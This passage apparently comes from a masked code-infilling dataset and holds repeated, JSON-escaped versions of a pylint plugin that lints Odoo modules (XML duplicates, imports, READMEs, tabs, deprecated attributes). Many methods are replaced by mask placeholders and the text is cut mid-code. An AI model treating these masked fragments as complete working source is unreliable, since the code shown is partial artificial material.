ext_file_rel)\n countline = 0\n with open(ext_file, 'rb') as fp:\n for line in fp:\n countline += 1\n line_space_trip = line.lstrip(b' ')\n if line_space_trip != line_space_trip.lstrip(b'\\t'):\n self.msg_args.append('%s:%d' % (ext_file_rel,\n countline))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _get_manifest_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n referenced_files[fname] = data_type\n return referenced_files\n\n def _get_xml_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n if not fname.endswith('.xml'):\n continue\n referenced_files.update(self.\n _get_xml_referenced_files_report(fname, data_type))\n return referenced_files\n\n def _get_xml_referenced_files_report(self, fname, data_type):\n return {os.path.join(*record.attrib[attribute].split(os.sep)[1:]):\n data_type for attribute in ['xml', 'xsl'] for record in self.\n parse_xml(os.path.join(self.module_path, fname)).xpath(\n '//report[@%s]' % attribute)}\n\n def _get_module_files(self):\n module_files = []\n for type_file in self.config.extfiles_convert:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n module_files.append(ext_file_rel)\n return module_files\n <mask token>\n\n def _check_xml_attribute_translatable(self):\n \"\"\"The xml attribute is missing the translation=\"off\" tag\n Example <attribute name=\"groups\">sale.group</attribute>\n \"\"\"\n if self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions != ['8.0']:\n return True\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), None,\n '//attribute[not(@name=\"string\") and not(@translation)]'):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n 
sourceline), 'xml_id'))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_tree_attribute(self):\n \"\"\"The tree-view declaration is using a deprecated attribute.\n Example <tree string=\"Partners\"></tree>\n \"\"\"\n checks = [{'attr': 'colors', 'skip_versions': {'4.2', '5.0', '6.0',\n '6.1', '7.0', '8.0'}, 'xpath': './/tree[@colors]'}, {'attr':\n 'fonts', 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0',\n '8.0'}, 'xpath': './/tree[@fonts]'}, {'attr': 'string',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0'}, 'xpath':\n './/tree[@string]'}]\n valid_versions = set(self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions)\n applicable_checks = [check for check in checks if check['attr'] in\n self.config.deprecated_tree_attributes and bool(valid_versions -\n check['skip_versions'])]\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.ui.view'):\n for check in applicable_checks:\n if record.xpath(check['xpath']):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), check['attr']))\n if self.msg_args:\n return False\n return True\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ModuleChecker(misc.WrapperModuleChecker):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @utils.check_messages('consider-merging-classes-inherited')\n def visit_assign(self, node):\n if not self.odoo_node:\n return\n if not self.linter.is_message_enabled(\n 'consider-merging-classes-inherited', node.lineno):\n return\n node_left = node.targets[0]\n if not isinstance(node_left, astroid.node_classes.AssignName\n ) or node_left.name not in ('_inherit', '_name') or not isinstance(\n node.value, astroid.node_classes.Const) or not isinstance(node.\n parent, astroid.ClassDef):\n return\n if node_left.name == '_name':\n node.parent.odoo_attribute_name = node.value.value\n return\n _name = getattr(node.parent, 'odoo_attribute_name', None)\n _inherit = node.value.value\n if _name and _name != _inherit:\n return\n key = self.odoo_node, _inherit\n node.file = self.linter.current_file\n self.inh_dup.setdefault(key, []).append(node)\n\n def _build_whitelist_module_patterns(self):\n known_patterns = []\n for known_pattern in self.config.import_name_whitelist:\n pattern = known_pattern.replace('*', '.*').replace('?', '.?')\n known_patterns.append(re.compile('^' + pattern + '$'))\n return known_patterns\n\n def open(self):\n \"\"\"Define variables to use cache\"\"\"\n self.inh_dup = {}\n patterns = self._build_whitelist_module_patterns()\n self._whitelist_module_patterns = patterns\n super(ModuleChecker, self).open()\n\n def close(self):\n \"\"\"Final process get all cached values and add messages\"\"\"\n for (odoo_node, class_dup_name), nodes in self.inh_dup.items():\n if len(nodes) == 1:\n continue\n path_nodes = []\n for node in nodes[1:]:\n relpath = os.path.relpath(node.file, os.path.dirname(\n odoo_node.file))\n path_nodes.append('%s:%d' % (relpath, node.lineno))\n self.add_message('consider-merging-classes-inherited', node=\n nodes[0], args=(class_dup_name, ', '.join(path_nodes)))\n <mask token>\n\n def 
check_odoo_relative_import(self, node):\n if self.odoo_module_name in self._get_odoo_module_imported(node):\n self.add_message('odoo-addons-relative-import', node=node, args\n =self.odoo_module_name)\n\n @staticmethod\n def _is_absolute_import(node, name):\n modnode = node.root()\n importedmodnode = ModuleChecker._get_imported_module(node, name)\n if (importedmodnode and importedmodnode.file and modnode is not\n importedmodnode and importedmodnode.name != name):\n return True\n return False\n <mask token>\n\n def _is_module_name_in_whitelist(self, module_name):\n parts = module_name.split('.')\n module_names_to_check = ['.'.join(parts[:first_k]) for first_k in\n range(len(parts), 0, -1)]\n for module_name_to_check in module_names_to_check:\n for pattern in self._whitelist_module_patterns:\n if pattern.match(module_name_to_check):\n return True\n return False\n\n def _check_imported_packages(self, node, module_name):\n \"\"\"Check if the import node is a external dependency to validate it\"\"\"\n if not module_name:\n return\n if not self.manifest_dict:\n return\n if not isinstance(node.parent, astroid.Module):\n return\n if self._is_absolute_import(node, module_name):\n return\n if self._is_module_name_in_whitelist(module_name):\n return\n isort_obj = isort.SortImports(file_contents='')\n import_category = isort_obj.place_module(module_name)\n if import_category not in ('FIRSTPARTY', 'THIRDPARTY'):\n return\n relpath = os.path.relpath(node.parent.file, os.path.dirname(self.\n manifest_file))\n if os.path.dirname(relpath) == 'tests':\n return\n self.add_message('missing-import-error', node=node, args=(module_name,)\n )\n ext_deps = self.manifest_dict.get('external_dependencies') or {}\n py_ext_deps = ext_deps.get('python') or []\n if isinstance(node, astroid.ImportFrom) and (node.level or 0) >= 1:\n return\n if module_name not in py_ext_deps and module_name.split('.')[0\n ] not in py_ext_deps:\n self.add_message('missing-manifest-dependency', node=node, args\n 
=(module_name,))\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_importfrom(self, node):\n self.check_odoo_relative_import(node)\n if isinstance(node.scope(), astroid.Module):\n package = node.modname\n self._check_imported_packages(node, package)\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_import(self, node):\n self.check_odoo_relative_import(node)\n for name, _ in node.names:\n if isinstance(node.scope(), astroid.Module):\n self._check_imported_packages(node, name)\n\n @utils.check_messages('except-pass')\n def visit_tryexcept(self, node):\n \"\"\"Visit block try except\"\"\"\n for handler in node.handlers:\n if not handler.name and len(handler.body) == 1 and isinstance(\n handler.body[0], astroid.node_classes.Pass):\n self.add_message('except-pass', node=handler)\n\n def _check_rst_syntax_error(self):\n \"\"\"Check if rst file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n rst_files = self.filter_files_ext('rst')\n self.msg_args = []\n for rst_file in rst_files:\n errors = self.check_rst_syntax(os.path.join(self.module_path,\n rst_file))\n for error in errors:\n msg = error.full_message\n res = re.search(\n 'No directive entry for \"([\\\\w|\\\\-]+)\"|Unknown directive type \"([\\\\w|\\\\-]+)\"|No role entry for \"([\\\\w|\\\\-]+)\"|Unknown interpreted text role \"([\\\\w|\\\\-]+)\"'\n , msg)\n if res:\n continue\n self.msg_args.append(('%s:%d' % (rst_file, error.line or 0),\n msg.strip('\\n').replace('\\n', '|')))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_xml_syntax_error(self):\n \"\"\"Check if xml file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n result = 
self.parse_xml(os.path.join(self.module_path, xml_file))\n if isinstance(result, string_types):\n self.msg_args.append((xml_file, result.strip('\\n').replace(\n '\\n', '|')))\n if self.msg_args:\n return False\n return True\n\n def _get_duplicate_xml_record_id(self, records):\n \"\"\"Get duplicated records based on attribute id\n :param records list: List of lxml.etree.Element \"<record\"\n :return: Duplicated items.\n e.g. {record.id: [record_node1, record_node2]}\n :rtype: dict\n \"\"\"\n all_records = {}\n for record in records:\n record_id = '%s/%s_noupdate_%s' % (record.attrib.get('section',\n ''), record.attrib.get('id', ''), record.getparent().attrib\n .get('noupdate', '0'))\n all_records.setdefault(record_id, []).append(record)\n records = {}\n for key, items in all_records.items():\n if not len(items) < 2:\n records[key] = items\n return records\n\n def _check_duplicate_xml_record_id(self):\n \"\"\"Check duplicated XML-IDs inside of the files of\n each manifest-section treated them separately\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_records = []\n for fname, section in self._get_manifest_referenced_files().items():\n if os.path.splitext(fname)[1].lower() != '.xml':\n continue\n fname = os.path.join(self.module_path, fname)\n for xml_record in self.get_xml_records(fname):\n xml_record.attrib['section'] = section\n xml_records.append(xml_record)\n for name, fobjs in self._get_duplicate_xml_record_id(xml_records\n ).items():\n self.msg_args.append(('%s:%d' % (os.path.relpath(fobjs[0].base,\n self.module_path), fobjs[0].sourceline), name, ', '.join([(\n os.path.relpath(fobj.base, self.module_path) + ':' + str(\n fobj.sourceline)) for fobj in fobjs[1:]])))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_redundant_modulename_xml(self):\n \"\"\"Check redundant module name in xml file.\n :return: False if exists errors and\n add list of errors in self.msg_args\n 
\"\"\"\n self.msg_args = []\n for xml_file_rel in self.filter_files_ext('xml', relpath=True):\n xml_file = os.path.join(self.module_path, xml_file_rel)\n for xml_id, lineno in self.get_xml_redundant_module_name(xml_file,\n self.module):\n self.msg_args.append(('%s:%d' % (xml_file_rel, lineno), xml_id)\n )\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _get_duplicate_xml_fields(self, fields):\n \"\"\"Get duplicated xml fields based on attribute name\n :param fields list: List of lxml.etree.Element \"<field\"\n :return: Duplicated items.\n e.g. {field.name: [field_node1, field_node2]}\n :rtype: dict\n \"\"\"\n all_fields = {}\n for field in fields:\n field_xml = field.attrib.get('name')\n if not field_xml:\n continue\n all_fields.setdefault((field_xml, field.attrib.get('context'),\n field.attrib.get('filter_domain'), field.getparent()), []\n ).append(field)\n return dict(((name, context, filter_domain, parent_node), nodes) for\n (name, context, filter_domain, parent_node), nodes in\n all_fields.items() if len(nodes) >= 2)\n\n def _check_duplicate_xml_fields(self):\n \"\"\"Check duplicate field in all record of xml files of a odoo module.\n Important note: this check does not work with inherited views.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file)):\n if record.xpath('field[@name=\"inherit_id\"]'):\n continue\n for xpath in ['field', 'field/*/field',\n 'field/*/field/tree/field', 'field/*/field/form/field']:\n for name, fobjs in self._get_duplicate_xml_fields(record\n .xpath(xpath)).items():\n self.msg_args.append(('%s:%d' % (xml_file, fobjs[0]\n .sourceline), name[0], ', '.join([str(fobj.\n sourceline) for fobj in fobjs[1:]])))\n if self.msg_args:\n return False\n return True\n\n def _check_dangerous_filter_wo_user(self):\n \"\"\"Check 
dangerous filter without a user assigned.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n ir_filter_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.filters')\n for ir_filter_record in ir_filter_records:\n ir_filter_fields = ir_filter_record.xpath(\n \"field[@name='name' or @name='user_id']\")\n if ir_filter_fields and len(ir_filter_fields) == 1:\n self.msg_args = '%s:%d' % (xml_file, ir_filter_record.\n sourceline), ir_filter_record.get('id')\n return False\n return True\n <mask token>\n\n @staticmethod\n def _is_replaced_field(view):\n try:\n arch = view.xpath(\"field[@name='arch' and @type='xml'][1]\")[0]\n except IndexError:\n return None\n replaces = arch.xpath(\n \".//field[@name='name' and @position='replace'][1]\") + arch.xpath(\n \".//xpath[@position='replace'][1]\")\n return bool(replaces)\n\n def _check_dangerous_view_replace_wo_priority(self):\n \"\"\"Check dangerous view defined with low priority\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n views = self.get_xml_records(os.path.join(self.module_path,\n xml_file), model='ir.ui.view')\n for view in views:\n priority = self._get_priority(view)\n is_replaced_field = self._is_replaced_field(view)\n if is_replaced_field and priority < self.config.min_priority:\n self.msg_args.append(('%s:%s' % (xml_file, view.\n sourceline), priority, self.config.min_priority))\n if self.msg_args:\n return False\n return True\n\n def _check_create_user_wo_reset_password(self):\n \"\"\"Check xml records of user without the context\n 'context=\"{'no_reset_password': True}\"'\n This context avoid send email and mail log warning\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = 
self.filter_files_ext('xml')\n for xml_file in xml_files:\n user_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='res.users')\n self.msg_args.extend([('%s:%s' % (xml_file, user_record.\n sourceline)) for user_record in user_records if user_record\n .xpath(\"field[@name='name']\") and 'no_reset_password' not in\n (user_record.get('context') or '')])\n if self.msg_args:\n return False\n return True\n\n def _check_javascript_lint(self):\n \"\"\"Check javascript lint\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for js_file_rel in self.filter_files_ext('js', relpath=True):\n js_file = os.path.join(self.module_path, js_file_rel)\n errors = self.check_js_lint(js_file, self.config.jslintrc)\n for error in errors:\n self.msg_args.append((js_file_rel + error,))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_data_xml_node(self):\n \"\"\"Check deprecated <data> xml node inside <odoo> xml node\n :return: False if found <data> xml node inside <odoo> xml node\"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n odoo_nodes = doc.xpath('/odoo') if not isinstance(doc, string_types\n ) else []\n children, data_node = (odoo_nodes[0].getchildren(), odoo_nodes[\n 0].findall('data')) if odoo_nodes else ([], [])\n if len(children) == 1 and len(data_node) == 1:\n lineno = odoo_nodes[0].sourceline\n self.msg_args.append('%s:%s' % (xml_file, lineno))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_wrong_tabs_instead_of_spaces(self):\n \"\"\"Check wrong tabs character instead of four spaces.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = 
os.path.join(self.module_path, ext_file_rel)\n countline = 0\n with open(ext_file, 'rb') as fp:\n for line in fp:\n countline += 1\n line_space_trip = line.lstrip(b' ')\n if line_space_trip != line_space_trip.lstrip(b'\\t'):\n self.msg_args.append('%s:%d' % (ext_file_rel,\n countline))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _get_manifest_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n referenced_files[fname] = data_type\n return referenced_files\n\n def _get_xml_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n if not fname.endswith('.xml'):\n continue\n referenced_files.update(self.\n _get_xml_referenced_files_report(fname, data_type))\n return referenced_files\n\n def _get_xml_referenced_files_report(self, fname, data_type):\n return {os.path.join(*record.attrib[attribute].split(os.sep)[1:]):\n data_type for attribute in ['xml', 'xsl'] for record in self.\n parse_xml(os.path.join(self.module_path, fname)).xpath(\n '//report[@%s]' % attribute)}\n\n def _get_module_files(self):\n module_files = []\n for type_file in self.config.extfiles_convert:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n module_files.append(ext_file_rel)\n return module_files\n\n def _check_file_not_used(self):\n \"\"\"Check if a file is not used from manifest\"\"\"\n module_files = set(self._get_module_files())\n referenced_files = set(self._get_manifest_referenced_files()).union(set\n (self._get_xml_referenced_files()))\n excluded_dirs = ['static', 'test', 'tests', 'migrations']\n no_referenced_files = [f for f in module_files - referenced_files if\n f.split(os.path.sep)[0] not in excluded_dirs]\n self.msg_args = no_referenced_files\n return not no_referenced_files\n\n def _check_xml_attribute_translatable(self):\n \"\"\"The xml 
attribute is missing the translation=\"off\" tag\n Example <attribute name=\"groups\">sale.group</attribute>\n \"\"\"\n if self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions != ['8.0']:\n return True\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), None,\n '//attribute[not(@name=\"string\") and not(@translation)]'):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), 'xml_id'))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_tree_attribute(self):\n \"\"\"The tree-view declaration is using a deprecated attribute.\n Example <tree string=\"Partners\"></tree>\n \"\"\"\n checks = [{'attr': 'colors', 'skip_versions': {'4.2', '5.0', '6.0',\n '6.1', '7.0', '8.0'}, 'xpath': './/tree[@colors]'}, {'attr':\n 'fonts', 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0',\n '8.0'}, 'xpath': './/tree[@fonts]'}, {'attr': 'string',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0'}, 'xpath':\n './/tree[@string]'}]\n valid_versions = set(self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions)\n applicable_checks = [check for check in checks if check['attr'] in\n self.config.deprecated_tree_attributes and bool(valid_versions -\n check['skip_versions'])]\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.ui.view'):\n for check in applicable_checks:\n if record.xpath(check['xpath']):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), check['attr']))\n if self.msg_args:\n return False\n return True\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass ModuleChecker(misc.WrapperModuleChecker):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @utils.check_messages('consider-merging-classes-inherited')\n def visit_assign(self, node):\n if not self.odoo_node:\n return\n if not self.linter.is_message_enabled(\n 'consider-merging-classes-inherited', node.lineno):\n return\n node_left = node.targets[0]\n if not isinstance(node_left, astroid.node_classes.AssignName\n ) or node_left.name not in ('_inherit', '_name') or not isinstance(\n node.value, astroid.node_classes.Const) or not isinstance(node.\n parent, astroid.ClassDef):\n return\n if node_left.name == '_name':\n node.parent.odoo_attribute_name = node.value.value\n return\n _name = getattr(node.parent, 'odoo_attribute_name', None)\n _inherit = node.value.value\n if _name and _name != _inherit:\n return\n key = self.odoo_node, _inherit\n node.file = self.linter.current_file\n self.inh_dup.setdefault(key, []).append(node)\n\n def _build_whitelist_module_patterns(self):\n known_patterns = []\n for known_pattern in self.config.import_name_whitelist:\n pattern = known_pattern.replace('*', '.*').replace('?', '.?')\n known_patterns.append(re.compile('^' + pattern + '$'))\n return known_patterns\n\n def open(self):\n \"\"\"Define variables to use cache\"\"\"\n self.inh_dup = {}\n patterns = self._build_whitelist_module_patterns()\n self._whitelist_module_patterns = patterns\n super(ModuleChecker, self).open()\n\n def close(self):\n \"\"\"Final process get all cached values and add messages\"\"\"\n for (odoo_node, class_dup_name), nodes in self.inh_dup.items():\n if len(nodes) == 1:\n continue\n path_nodes = []\n for node in nodes[1:]:\n relpath = os.path.relpath(node.file, os.path.dirname(\n odoo_node.file))\n path_nodes.append('%s:%d' % (relpath, node.lineno))\n self.add_message('consider-merging-classes-inherited', node=\n nodes[0], args=(class_dup_name, ', '.join(path_nodes)))\n\n def 
_get_odoo_module_imported(self, node):\n odoo_module = []\n if isinstance(node, astroid.ImportFrom) and ('openerp.addons' in\n node.modname or 'odoo.addons' in node.modname):\n packages = node.modname.split('.')\n if len(packages) >= 3:\n odoo_module.append(packages[2])\n else:\n odoo_module.append(node.names[0][0])\n elif isinstance(node, astroid.Import):\n for name, _ in node.names:\n if 'openerp.addons' not in name and 'odoo.addons' not in name:\n continue\n packages = name.split('.')\n if len(packages) >= 3:\n odoo_module.append(packages[2])\n return odoo_module\n\n def check_odoo_relative_import(self, node):\n if self.odoo_module_name in self._get_odoo_module_imported(node):\n self.add_message('odoo-addons-relative-import', node=node, args\n =self.odoo_module_name)\n\n @staticmethod\n def _is_absolute_import(node, name):\n modnode = node.root()\n importedmodnode = ModuleChecker._get_imported_module(node, name)\n if (importedmodnode and importedmodnode.file and modnode is not\n importedmodnode and importedmodnode.name != name):\n return True\n return False\n\n @staticmethod\n def _get_imported_module(importnode, modname):\n try:\n return importnode.do_import_module(modname)\n except:\n pass\n\n def _is_module_name_in_whitelist(self, module_name):\n parts = module_name.split('.')\n module_names_to_check = ['.'.join(parts[:first_k]) for first_k in\n range(len(parts), 0, -1)]\n for module_name_to_check in module_names_to_check:\n for pattern in self._whitelist_module_patterns:\n if pattern.match(module_name_to_check):\n return True\n return False\n\n def _check_imported_packages(self, node, module_name):\n \"\"\"Check if the import node is a external dependency to validate it\"\"\"\n if not module_name:\n return\n if not self.manifest_dict:\n return\n if not isinstance(node.parent, astroid.Module):\n return\n if self._is_absolute_import(node, module_name):\n return\n if self._is_module_name_in_whitelist(module_name):\n return\n isort_obj = 
isort.SortImports(file_contents='')\n import_category = isort_obj.place_module(module_name)\n if import_category not in ('FIRSTPARTY', 'THIRDPARTY'):\n return\n relpath = os.path.relpath(node.parent.file, os.path.dirname(self.\n manifest_file))\n if os.path.dirname(relpath) == 'tests':\n return\n self.add_message('missing-import-error', node=node, args=(module_name,)\n )\n ext_deps = self.manifest_dict.get('external_dependencies') or {}\n py_ext_deps = ext_deps.get('python') or []\n if isinstance(node, astroid.ImportFrom) and (node.level or 0) >= 1:\n return\n if module_name not in py_ext_deps and module_name.split('.')[0\n ] not in py_ext_deps:\n self.add_message('missing-manifest-dependency', node=node, args\n =(module_name,))\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_importfrom(self, node):\n self.check_odoo_relative_import(node)\n if isinstance(node.scope(), astroid.Module):\n package = node.modname\n self._check_imported_packages(node, package)\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_import(self, node):\n self.check_odoo_relative_import(node)\n for name, _ in node.names:\n if isinstance(node.scope(), astroid.Module):\n self._check_imported_packages(node, name)\n\n @utils.check_messages('except-pass')\n def visit_tryexcept(self, node):\n \"\"\"Visit block try except\"\"\"\n for handler in node.handlers:\n if not handler.name and len(handler.body) == 1 and isinstance(\n handler.body[0], astroid.node_classes.Pass):\n self.add_message('except-pass', node=handler)\n\n def _check_rst_syntax_error(self):\n \"\"\"Check if rst file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n rst_files = self.filter_files_ext('rst')\n self.msg_args = []\n for rst_file in rst_files:\n errors = self.check_rst_syntax(os.path.join(self.module_path,\n 
rst_file))\n for error in errors:\n msg = error.full_message\n res = re.search(\n 'No directive entry for \"([\\\\w|\\\\-]+)\"|Unknown directive type \"([\\\\w|\\\\-]+)\"|No role entry for \"([\\\\w|\\\\-]+)\"|Unknown interpreted text role \"([\\\\w|\\\\-]+)\"'\n , msg)\n if res:\n continue\n self.msg_args.append(('%s:%d' % (rst_file, error.line or 0),\n msg.strip('\\n').replace('\\n', '|')))\n if self.msg_args:\n return False\n return True\n\n def _check_missing_readme(self):\n \"\"\"Check if exists ./README.{rst,md,txt} file\n :return: If exists return True else False\n \"\"\"\n self.msg_args = self.config.readme_template_url,\n for readme in DFTL_README_FILES:\n if os.path.isfile(os.path.join(self.module_path, readme)):\n return True\n return False\n\n def _check_xml_syntax_error(self):\n \"\"\"Check if xml file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n result = self.parse_xml(os.path.join(self.module_path, xml_file))\n if isinstance(result, string_types):\n self.msg_args.append((xml_file, result.strip('\\n').replace(\n '\\n', '|')))\n if self.msg_args:\n return False\n return True\n\n def _get_duplicate_xml_record_id(self, records):\n \"\"\"Get duplicated records based on attribute id\n :param records list: List of lxml.etree.Element \"<record\"\n :return: Duplicated items.\n e.g. 
{record.id: [record_node1, record_node2]}\n :rtype: dict\n \"\"\"\n all_records = {}\n for record in records:\n record_id = '%s/%s_noupdate_%s' % (record.attrib.get('section',\n ''), record.attrib.get('id', ''), record.getparent().attrib\n .get('noupdate', '0'))\n all_records.setdefault(record_id, []).append(record)\n records = {}\n for key, items in all_records.items():\n if not len(items) < 2:\n records[key] = items\n return records\n\n def _check_duplicate_xml_record_id(self):\n \"\"\"Check duplicated XML-IDs inside of the files of\n each manifest-section treated them separately\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_records = []\n for fname, section in self._get_manifest_referenced_files().items():\n if os.path.splitext(fname)[1].lower() != '.xml':\n continue\n fname = os.path.join(self.module_path, fname)\n for xml_record in self.get_xml_records(fname):\n xml_record.attrib['section'] = section\n xml_records.append(xml_record)\n for name, fobjs in self._get_duplicate_xml_record_id(xml_records\n ).items():\n self.msg_args.append(('%s:%d' % (os.path.relpath(fobjs[0].base,\n self.module_path), fobjs[0].sourceline), name, ', '.join([(\n os.path.relpath(fobj.base, self.module_path) + ':' + str(\n fobj.sourceline)) for fobj in fobjs[1:]])))\n if self.msg_args:\n return False\n return True\n\n def _check_duplicate_id_csv(self):\n \"\"\"Check duplicate xml id in ir.model.access.csv files of a odoo module.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n all_csv_ids = []\n self.msg_args = []\n for csv_file_rel in self.filter_files_ext('csv', relpath=True):\n csv_file = os.path.join(self.module_path, csv_file_rel)\n if os.path.basename(csv_file) == 'ir.model.access.csv':\n all_csv_ids.extend(self.get_field_csv(csv_file))\n duplicated_ids_csv = self.get_duplicated_items(all_csv_ids)\n for duplicated_id_csv in duplicated_ids_csv:\n 
self.msg_args.append((csv_file_rel, duplicated_id_csv))\n if duplicated_ids_csv:\n return False\n return True\n\n def _check_redundant_modulename_xml(self):\n \"\"\"Check redundant module name in xml file.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file_rel in self.filter_files_ext('xml', relpath=True):\n xml_file = os.path.join(self.module_path, xml_file_rel)\n for xml_id, lineno in self.get_xml_redundant_module_name(xml_file,\n self.module):\n self.msg_args.append(('%s:%d' % (xml_file_rel, lineno), xml_id)\n )\n if self.msg_args:\n return False\n return True\n\n def _check_character_not_valid_in_resource_link(self):\n \"\"\"The resource in in src/href contains a not valid chararter\"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml'):\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n for name, attr in (('link', 'href'), ('script', 'src')):\n nodes = doc.xpath('.//%s[@%s]' % (name, attr)\n ) if not isinstance(doc, string_types) else []\n for node in nodes:\n resource = node.get(attr, '')\n ext = os.path.splitext(os.path.basename(resource))[1]\n if resource.startswith('/') and not re.search(\n '^[.][a-zA-Z]+$', ext):\n self.msg_args.append('%s:%s' % (xml_file, node.\n sourceline))\n if self.msg_args:\n return False\n return True\n\n def _get_duplicate_xml_fields(self, fields):\n \"\"\"Get duplicated xml fields based on attribute name\n :param fields list: List of lxml.etree.Element \"<field\"\n :return: Duplicated items.\n e.g. 
{field.name: [field_node1, field_node2]}\n :rtype: dict\n \"\"\"\n all_fields = {}\n for field in fields:\n field_xml = field.attrib.get('name')\n if not field_xml:\n continue\n all_fields.setdefault((field_xml, field.attrib.get('context'),\n field.attrib.get('filter_domain'), field.getparent()), []\n ).append(field)\n return dict(((name, context, filter_domain, parent_node), nodes) for\n (name, context, filter_domain, parent_node), nodes in\n all_fields.items() if len(nodes) >= 2)\n\n def _check_duplicate_xml_fields(self):\n \"\"\"Check duplicate field in all record of xml files of a odoo module.\n Important note: this check does not work with inherited views.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file)):\n if record.xpath('field[@name=\"inherit_id\"]'):\n continue\n for xpath in ['field', 'field/*/field',\n 'field/*/field/tree/field', 'field/*/field/form/field']:\n for name, fobjs in self._get_duplicate_xml_fields(record\n .xpath(xpath)).items():\n self.msg_args.append(('%s:%d' % (xml_file, fobjs[0]\n .sourceline), name[0], ', '.join([str(fobj.\n sourceline) for fobj in fobjs[1:]])))\n if self.msg_args:\n return False\n return True\n\n def _check_dangerous_filter_wo_user(self):\n \"\"\"Check dangerous filter without a user assigned.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n ir_filter_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.filters')\n for ir_filter_record in ir_filter_records:\n ir_filter_fields = ir_filter_record.xpath(\n \"field[@name='name' or 